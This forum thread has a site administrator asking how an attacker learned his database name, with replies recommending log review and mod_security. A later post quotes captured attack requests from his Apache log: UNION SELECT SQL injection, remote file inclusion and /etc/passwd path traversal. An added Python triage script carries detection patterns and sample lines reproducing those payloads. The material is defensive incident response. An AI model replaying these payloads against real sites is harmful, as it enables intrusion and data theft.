LinuxQuestions.org
Old 03-25-2009, 10:38 PM   #1
tanveer
Member
 
Registered: Feb 2004
Location: e@rth
Distribution: RHEL-3/4/5,Gloria,opensolaris
Posts: 525

Rep: Reputation: 39
Vulnerability in website with sql Injection


Dear All,

Need help on a web server. The web server is a static one with apache, php and mysql, and as manager there is etomite to change page text or create new documents in the website.
Now in our feedback form an anonymous person posted that he/she knows the database name and also gave a sample table name. Now my question is how come it can be known?
All the URLs of the website are like
http://www.site.com/index.php?id=xxx

Is there any way to find out the backend database name or the table name from the web?

Thanks for your help.
 
Old 03-26-2009, 04:00 AM   #2
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3600
Look at http://secunia.com/advisories/produc...ask=advisories, then check your webserver and database logs for "odd" queries? You might want to severely restrict access in the meanwhile if the data is worth anything to you.

Last edited by unSpawn; 03-26-2009 at 04:01 AM.
 
Old 03-26-2009, 04:25 AM   #3
reptiler
Member
 
Registered: Mar 2009
Location: Hong Kong
Distribution: Fedora
Posts: 184

Rep: Reputation: 42
On a quick check I found 4 vulnerabilities that may apply, but they all refer to a version of etomite which is like 3 years old.
Also Secunia doesn't show anything that seems relevant and more recent than that.

Are you maybe running an ancient version? Or are there maybe any other scripts which may have been targeted?
 
Old 03-26-2009, 07:32 AM   #4
tanveer
Member
 
Registered: Feb 2004
Location: e@rth
Distribution: RHEL-3/4/5,Gloria,opensolaris
Posts: 525

Original Poster
Rep: Reputation: 39
Thanks a lot for your great suggestions.

The one below is the one which I faced earlier, around three months back.
PHP Code:
Etomite rfiles.php File Upload Vulnerability 
Then I updated etomite to the latest version and removed that from etomite.

I have .htaccess in place to restrict the manager folder, which is etomite, to very few people.

All pages are given an index as created by etomite and just the id changes. And there are only two forms where users can submit their suggestions and feedback. Are they the target?

Are there any security sites which can scan my site for these sql injections or vulnerability?
 
Old 03-27-2009, 10:58 AM   #5
fotoguy
Senior Member
 
Registered: Mar 2003
Location: Brisbane Queensland Australia
Distribution: Custom Debian Live ISO's
Posts: 1,291

Rep: Reputation: 62
Also have a look at installing modsecurity for apache; this is an intrusion detection application designed to look for various types of scans made against your server. It will look for sql injection attacks and block them immediately.
 
Old 03-27-2009, 11:34 AM   #6
bslorence
LQ Newbie
 
Registered: Mar 2009
Posts: 3

Rep: Reputation: 3
Quote:
Originally Posted by tanveer
Are there any security sites which can scan my site for these sql injections or vulnerability?
The "good guys" have vulnerability-scanning software so there's little reason to suspect that script kiddies don't. And of course if the site's being attacked in a targeted way, the attacker wouldn't need to use automation.

As suggested above, you really ought to look at your web access logs. If you can pull together the last few months' worth of web access logs into one file, it should be fairly simple to use awk and grep to search through the file for requests that don't follow this pattern:
Code:
GET /index.php?id=<numeric id within reasonable range here>
If you're not already monitoring your web access logs on a routine schedule or by means of some sort of IDS software, you might want to start.
 
Old 03-28-2009, 02:13 AM   #7
tanveer
Member
 
Registered: Feb 2004
Location: e@rth
Distribution: RHEL-3/4/5,Gloria,opensolaris
Posts: 525

Original Poster
Rep: Reputation: 39
Thank you all for being with me.

I am going to find him out. I have written a perl script to enter the last 2 months of apache access log into a mysql database. Now I will search for any unusual URL, and if I find one then I have the IP too from the log.

It would be better if the mysql log was also enabled, but unfortunately I disabled it after running it for 1 month on a test basis. Found no reason to enable that actually.

In the web folder I have two manager folders which are protected by .htaccess to very restricted IPs. So no way he did anything from there.
There are no login or authentication pages on my website. Only two form pages, one for giving feedback and one for contact info. He used the feedback one to declare his findings.
So there are two ways he did it: either by doing something through the URL, or by manipulating the 2 forms by sql injection.

Let me find out which one it is.

I am also thinking of implementing greensql for further security.

Thanks.
 
Old 03-28-2009, 08:28 AM   #8
tanveer
Member
 
Registered: Feb 2004
Location: e@rth
Distribution: RHEL-3/4/5,Gloria,opensolaris
Posts: 525

Original Poster
Rep: Reputation: 39

OK, found lots of unusual stuff in the apache access log, for example:

PHP Code:
/index.php?id=-999+AND+3=0+UNION+ALL+SELECT+0x3065376332613738353864303833656636636535323337343330636466343033,0x3a3a7865512d312d7465643a3a,0x3a3a7865512d322d7465643a3a,0x3a3a7865512d332d7465643a3a,0x
/index.php?id=-999+AND+3=0+UNION+ALL+SELECT+0x3065376332613738353864303833656636636535323337343330636466343033,0x3a3a7865512d312d7465643a3a--
/index.php?id=http://cranea.cl/s?
/index.php?id=RemoteCommandxeQters
/index.php?id=-0/**/AND/**/4=1/**/UNION/**/ALL/**/SELECT/**/0x3065376332613738353864303833656636636535323337343330636466343033,0x3a3a7865512d312d7465643a3a,0x3a3a7865512d322d7465643a3a,0x3a3a7865512d3
/cgi-bin/phf?Qalias=x%250a/bin/cat%2520/etc/passwd&sourceid=opera&ie=utf-8&oe=utf-8
/cgi-bin/ion-p.exe?page=c:\\winnt\\win.ini
/cgi-bin/rot13sj.cgi?/etc/passwd
/cgi-bin/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
/cgi-bin/module.php?module=osTicket&file=/modules/osTicket/admin.php 
and lots and lots of the above, done in different ways.

What will be the best medicine for this; mod_security?
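A worked version of the access-log triage bslorence outlines in post #6, applied to the kind of requests tanveer quotes in post #8; this is an added example, not code from the thread. It assumes Apache's combined log format, treats a numeric id of up to five digits as the "reasonable range" baseline, and decodes the 0x... MySQL string literals so a UNION SELECT payload can be read at a glance; the log lines are constructed, with made-up IPs and timestamps.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines (made-up IPs/timestamps; paths follow the shapes in post #8).
SAMPLE_LOG = """\
203.0.113.5 - - [28/Mar/2009:01:02:03 -0500] "GET /index.php?id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [28/Mar/2009:01:10:00 -0500] "GET /index.php?id=-999+AND+3=0+UNION+ALL+SELECT+0x3a3a7865512d312d7465643a3a-- HTTP/1.1" 200 5120 "-" "Opera/9"
198.51.100.7 - - [28/Mar/2009:01:10:02 -0500] "GET /index.php?id=http://cranea.cl/s? HTTP/1.1" 200 5120 "-" "Opera/9"
198.51.100.7 - - [28/Mar/2009:01:10:05 -0500] "GET /cgi-bin/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00 HTTP/1.1" 404 290 "-" "Opera/9"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Post #6's baseline: the site root or a numeric id "within reasonable range" (1-5 digits is an assumption).
EXPECTED = re.compile(r'^(/|/index\.php\?id=\d{1,5})$')
HEX_LIT = re.compile(r'0x([0-9a-fA-F]{2,})')  # MySQL hex string literals seen in the payloads


def decode_hex_literals(path):
    """Turn 0x... literals into readable text so a payload can be triaged at a glance."""
    out = []
    for h in HEX_LIT.findall(path):
        try:
            out.append(bytes.fromhex(h).decode('ascii'))
        except ValueError:                    # odd length or non-ASCII bytes
            out.append('<undecodable>')
    return out


def classify(path):
    """Return None for baseline traffic, otherwise a short label for the anomaly."""
    if EXPECTED.match(path):
        return None
    decoded = unquote(path).lower()           # undo %xx encoding before matching
    if re.search(r'\bunion\b.*\bselect\b', decoded) or '/**/' in decoded:
        return 'sql-injection'
    if re.search(r'\?[^=]*=https?://', decoded):
        return 'remote-file-inclusion'
    if '../' in decoded or '/etc/passwd' in decoded or '\x00' in decoded:
        return 'path-traversal'
    return 'unexpected-path'


def triage(log_text):
    """Parse each line, keep only off-baseline requests, and count hits per source IP."""
    findings, per_ip = [], {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        label = classify(m['path']) if m else None
        if label is None:
            continue
        findings.append({'ip': m['ip'], 'label': label, 'path': m['path'], 'hex_decoded': decode_hex_literals(m['path'])})
        per_ip[m['ip']] = per_ip.get(m['ip'], 0) + 1
    return findings, per_ip
```

Running `triage()` over a real log will also surface the CGI scanner probes from post #8 as `path-traversal` or `unexpected-path`, and the per-IP counts give the addresses worth blocking or reporting.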
 